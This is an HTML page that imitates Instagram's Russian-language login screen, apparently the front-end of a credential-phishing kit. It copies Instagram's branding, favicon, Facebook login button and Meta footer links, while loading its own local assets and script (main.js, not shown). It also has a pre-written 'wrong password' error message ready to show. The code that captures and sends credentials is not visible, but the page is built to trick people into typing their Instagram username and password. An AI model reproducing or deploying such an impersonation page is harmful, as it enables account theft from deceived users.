<!DOCTYPE html>
<html lang="ru">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Instagram</title>
    <link rel="icon" href="https://static.cdninstagram.com/rsrc.php/v4/yI/r/VsNE-OHk_8a.png">
    <link rel="stylesheet" href="style.css">
    <style>
        @import url('https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700&display=swap');

        .loader {
            width: 5px;
            height: 5px;
            position: relative;
            display: flex;
            justify-content: center;
            align-items: center;
        }

        .loader div {
            position: absolute;
            width: 2px;
            height: 7px;
            background: white;
            animation: fade 1s linear infinite;
        }

        .loader div:nth-child(1) { transform: rotate(0deg) translateY(-9px); animation-delay: 0.083s; }
        .loader div:nth-child(2) { transform: rotate(45deg) translateY(-9px); animation-delay: 0.25s; }
        .loader div:nth-child(3) { transform: rotate(90deg) translateY(-9px); animation-delay: 0.416s; }
        .loader div:nth-child(4) { transform: rotate(135deg) translateY(-9px); animation-delay: 0.583s; }
        .loader div:nth-child(5) { transform: rotate(180deg) translateY(-9px); animation-delay: 0.75s; }
        .loader div:nth-child(6) { transform: rotate(225deg) translateY(-9px); animation-delay: 0.916s; }
        .loader div:nth-child(7) { transform: rotate(270deg) translateY(-9px); animation-delay: 1.083s; }
        .loader div:nth-child(8) { transform: rotate(315deg) translateY(-9px); animation-delay: 1.25s; }


        @keyframes fade {
            0% { opacity: 1; }
            100% { opacity: 0.2; }
        }
    </style>
</head>
<body>
<div class="container">
    <div class="login-box">
        <h1></h1>
        <input id="username" type="text" placeholder="Телефон, имя пользователя или эл. адрес">
        <div class="password-container">
        <input id="password" type="password" placeholder="Пароль">
            <span id="toggle-password" onclick="togglePassword()">Показать</span>
        </div>
        <button id="loginButton" style="display: flex; align-items: center; justify-content: center; gap: 10px; padding: 10px 30px; border: none; color: white; font-size: 14px; cursor: pointer; width: 300px; height: 35px; text-align: center; position: relative;">
            <span id="hidden-text" style="text-align: center;">Войти</span>
            <div class="loader" id="loader" style="display: none; position: absolute; left: 50%; transform: translateX(-50%);">
                <div></div><div></div><div></div><div></div><div></div><div></div><div></div><div></div>
            </div>
        </button>
        <div class="or">ИЛИ</div>
        <button class="fb-login">
            <svg aria-label="Войти через Facebook" class="x1lliihq x1n2onr6 x173jzuc" fill="currentColor" height="20"
                 role="img" viewBox="0 0 16 16" width="20"><title>Войти через Facebook</title>
                <g clip-path="url(#a)">
                    <path d="M8 0C3.6 0 0 3.6 0 8c0 4 2.9 7.3 6.8 7.9v-5.6h-2V8h2V6.2c0-2 1.2-3.1 3-3.1.9 0 1.8.2 1.8.2v2h-1c-1 0-1.3.6-1.3 1.3V8h2.2l-.4 2.3H9.2v5.6C13.1 15.3 16 12 16 8c0-4.4-3.6-8-8-8Z"
                          fill="currentColor"></path>
                </g>
                <defs>
                    <clipPath id="a">
                        <rect fill="currentColor" height="16" width="16"></rect>
                    </clipPath>
                </defs>
            </svg>
            Войти через Facebook
        </button>
            <div id="error-message" class="error-message">К сожалению, вы ввели неправильный <br> пароль. Проверьте свой пароль еще раз.</div>

        <a href="#" class="forgot">Забыли пароль?</a>
        <div class="signup">У вас нет аккаунта? <a href="#">Зарегистрироваться</a></div>
        <div class="app-links">
            <p class="app-links-text">Установите приложение.</p>
            <div class="app-links-images">
                <img src="src/fDjwyLC88oO.png" alt="Google Play">
                <img src="src/_UbeIRgTpG-.png" alt="Microsoft Store">
            </div>
        </div>
    </div>
    <footer class="footer">
        <div class="footer-links">
            <a href="https://about.meta.com/">Meta</a>
            <a href="https://about.instagram.com/">Информация</a>
            <a href="https://about.instagram.com/blog/">Блог</a>
            <a href="https://about.instagram.com/about-us/careers">Вакансии</a>
            <a href="https://help.instagram.com/">Помощь</a>
            <a href="https://developers.facebook.com/docs/instagram-platform">API</a>
            <a href="https://privacycenter.instagram.com/policy/?entry_point=ig_help_center_data_policy_redirect">Конфиденциальность</a>
            <a href="https://help.instagram.com/581066165581870/">Условия</a>
            <a href="https://www.instagram.com/explore/locations/">Места</a>
            <a href="https://www.instagram.com/web/lite/">Instagram Lite</a>
            <a href="https://www.threads.net/">Threads</a>
            <a href="https://www.facebook.com/help/instagram/261704639352628">Загрузка контактов и лиц, не являющихся пользователями</a>
            <a href="https://www.instagram.com/accounts/login/?next=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fmeta_verified%2F%3Fentrypoint%3Dweb_footer%26__coig_login%3D1#">Meta Verified</a>
        </div>
        <div class="footer-bottom">
            <span>Русский ▼</span>
            <span>© 2025 Instagram from Meta</span>
        </div>
    </footer>

</div>
<script src="main.js">


</script>
</body>
</html>
